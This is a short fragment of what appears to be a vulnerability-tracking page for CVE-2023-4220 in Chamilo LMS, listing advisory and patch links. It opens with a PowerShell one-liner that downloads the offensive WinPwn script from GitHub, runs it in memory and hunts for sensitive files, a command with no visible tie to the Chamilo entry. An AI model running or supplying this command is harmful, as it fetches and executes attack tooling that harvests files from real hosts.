iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-4220 |
| support.chamilo.org |
GitHub CVE
vendor-advisory
|
https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-130-2023-09-04-Critical-impact-High-risk-Unauthenticated-users-may-gain-XSS-and-unauthenticated-RCE-CVE-2023-4220 |
| starlabs.sg |
GitHub CVE
third-party-advisory
|
https://starlabs.sg/advisories/23/23-4220 |
| github.com |
GitHub CVE
patch
|
https://github.com/chamilo/chamilo-lms/commit/3b487a55076fb06f96809b790a35dcdd42f8ec49 |